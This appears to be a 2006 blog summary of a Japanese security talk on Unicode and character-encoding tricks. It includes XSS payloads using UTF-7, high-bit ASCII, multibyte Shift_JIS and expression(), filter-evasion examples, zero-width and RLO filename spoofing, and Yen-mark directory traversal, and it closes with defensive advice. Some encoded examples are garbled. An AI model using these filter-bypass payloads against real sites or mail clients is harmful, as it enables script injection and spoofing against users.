Tuesday, December 19, 2006

[Security] Do that with Unicode!!

In Dec 9 2006 at hiroshima 10 TEXT HACK was Presentation by Yosuke Hasegawa who also Microsoft MVP for Windows-Security.

He Presented in Security-Momiji(IT Security Workshop in Hiroshima) .
document are below(Japanese Only)
-> http://openmya.hacker.jp/hasegawa/public/20061209/momiji.html

---

TEXT HACKS,Useless 10 technique after another.

  1. HACK #1 XSS it! (UTF-7)
    1. Script with UTF-7
      Ex) script with UTF-7
      +ADw-SCRIPT+AD4-alert(\'XSS\');+ADw-+AC8-SCRIPT+AD4-
    2. Internet Explorer can't set Encoding .And Internet Explorer is UTF-7 LIKELY Character automatic distinction to UTF-7.
      Ex) Google Search replies "404 not found". (2005.12)
      IIS error page XSS in MS06-053 (2006.10)
    3. Specify encoding from outside.
      Ex) Google Appliance XSS (2006.11)
  2. HACK #2 more XSS it!(US-ASCII)
    1. Internet Explorer Disregard first bits in 7bit character set(ex.US-ASCII or ISO-2022-JP...)
      Ex) both 0x73 and 0xF3 are same "s" in IE on using US-ASCII.
      s : 0x73 01110011
      0xF3 11110011
      Both 0x3C and 0xBC are same "<" in IE on using US-ASCII. < : 0x3C 00111100 0xBC 10111100
    2. above can bypass META characters detection.
      Ex) シscr iptセalert(「XSS「)シ/scriptセ

      シ : 0xBC(7bit) -> 0x3C(first bit on) -> same as <
      セ : 0xBE(7bit) -> 0x3E(first bit on) -> same as >
      「 : 0xA2(7bit) -> 0x22(first bit on) -> same as '

      These mean "<sctipt>alert('XSS')</script>" on US-ASCII.

  3. HACK #3 XSS by Japanese(Multi Byte Characters)
    1. "first byte" of Shift_jis or EUC-JP Can destroy HTML.
      Use 0x82(first byte of Shift_JIS) to next " (double quote) as force 2nd byte of Shift_JIS to Intenet Blowser.
      ---
      <input type=text value="(0x82)"><br>
      <input type=text value=" onmuseover=alert('xss');(0x82)"><br>
      ---
      (Source from http://www.atmarkit.co.jp/fsecurity/rensai/hoshino10/hoshino02.html (Only Japanese))

      Ex2) Yahoo Mail (2005.11)
      ---
      Content-Type: text/html; charset=GB2312
      Subject: example

      <span
      style='width:expr/*[0x81]*/*/ession(alert())'>
      exploited</span>
      ---

      Ex2) Hotmail (2006.8)
      ---
      Content-Type: text/html; charset=SHIFT_JIS
      Subject: example

      <font ></font><font face="
      onmouseover=alert() s=[0x81]">exploited</font>
      ---
  4. HACK #4 More more XSS (Do that with expression!)
    1. Internet Explorer can use UNICODE or Double Byte to write "expression( )" or "url()"
      ---
      Ex) Double Byte
      <div style="{left:expression(alert('xss'))}">
      <div style="{left:expression(alert('xss'))}">
      <div style="{background:URL(javascript:alert('xss'))}">

      Ex) Unicode
      You can use Character to write expression or url.
      R - U+0280 (€)
      N - U+0274(t)、U+207F( )
      L - U+029F(・)

      Hatena Diary (2005.12)
      Hotmail、Windows Live Mail (2006.11)
      SquirrelMail (2006.12)
  5. HACK #5 more and more XSS (Do that with unvisible charactors)
    1. Internet Explorer all Disregard Null Charactor in HTML.
      <s(0x00)cript>
    2. Internet Explorer 0x0B or 0x0C treated as SPACE in HTML.
      <script(0x0B)>
      <s (0x0C)onmouseover="...">

    3. Mozilla FireFox 1.5.0.4 and Prior version disregard BOM (U+FEFF; ZERO WIDTH NO-BREAK SPACE).
      <s(BOM)cript>
      1. MFSA 2006-42: Web site XSS using BOM on UTF-8 pages
  6. HACK #6 bypass mail contents filter.
    1. Outlook Express is also Disregard first bit of 7bit charactor such US-ASCII or ISO-2022-JP.
      MIME-Version: 1.0
      
      Content-Type: text/plain; charset=US-ASCII
      Content-Transfer-Encoding: 7bit

      This is test mail

      begin 644 eicar.com
      ヘカ#5/(5`E0$%06S1<4%i8-30h4%xi-t-#*3=])
      $5)0T%2+5-404Y$05)$+4%.
      75$E625)54RU415-4+49)3$4A)$@K2"I#
      `
      end

      uuencode eicar.com(virus test file) and first bit on.
  7. HACK #7 Create same file name(do that with ZERO WIDTH Charactors)
    1. by using ZERO WIDTH or Control Charactors a part of file name can make looks like same file name.
      1. Unvisible Charactors.
        - U+200B ( ZERO WIDTH SPACE )
        - U+200C ( ZERO WIDTH NON-JOINER )
        - U+200D ( ZERO WIDTH JOINER )
        - U+FEFF ( ZERO WIDTH NO-BREAK SPACE )
        - U+202A ( LEFT-TO-RIGHT EMBEDDING )
  8. HACK #8 Directory Traversal (do that with Yen mark)
    1. Unicode has backslash (U+005C) and Yen mark(U+00A5).
    2. Yen mark(U+00A5) can use for file name.
    3. Yen mark(U+00A5) convert to Shift-JIS and be backslash(0x5C)
      1. Therefore, in the application not to treat the file name with Unicode Directory Traversal might be happen.
        Ex) DoS might be generated.if application that recurrently enumerates the file .
        and If the folder like "..\".
        Ex)
        - Namazu 2.0.15 (for Windows) prior
        - Hyper Estraier Version 1.0.2 (for Windows) prior
        - Becky! Ver.2.22 prior
  9. HACK #9 registry key that doesn't pretend exist but exist(Do that with ZERO WIDTH Charactor)
    1. Registry entry can use UNICODE,so you can use ZERO WIDTH Charactors to camouflaged by using ZERO WIDTH Charactors ,same as file name HACK #7.
  10. HACK #10 camouflage the file extension (do that with Bidi)
    1. Unicode has "bidirectional algorithm" function.
      show charactors to right directional to left directional.
      U+202E(RIGHT-TO-LEFT OVERRIDE; RLO) into file name,file name after RLO,charactors are left side right.
      1. Ex) RLO with file name
        Real file name: this-(U+202E)txt.exe
        File name shown:this-exe.txt

  11. Summary
    1. permitted characters are the MANAGED white list.
    2. Character string is inspection are after regularized.
    3. Don't change after regularized.
    4. Dont cheated by Unicode that looks like.
    5. The behavior of difference between a Browser and MUA.(if possible)
  12. Reference
    1. Hasegawa's Blog(Japanese only)
    2. XSS Vulnerability in UTF-7 encoded tag strings.(Slash dot japan)(Japanese Only)
    3. sla.ckers.org web application security forum :: Full Disclosure :: Widespread XSS for Google Search Appliance
    4. ha.ckers.org web application security lab - Archive ≫ US-ASCII XSS part 2
    5. ha.ckers.org web application security lab - Archive ≫ Yahoo Vulnerable To Selected Encoding XSS
    6. Pitfall of multi byte (Japanese only)
    7. Bypassing script filters with variable-width encodings
    8. [openmya:035806] Cause of XSS by excessive detection of "Expression" in IE
    9. MFSA 2006-42: Web site XSS using BOM on UTF-8 pages
    10. [Namazu-devel-ja 944] Japanese full-text search system Namazu 2.0.15 release}



No comments: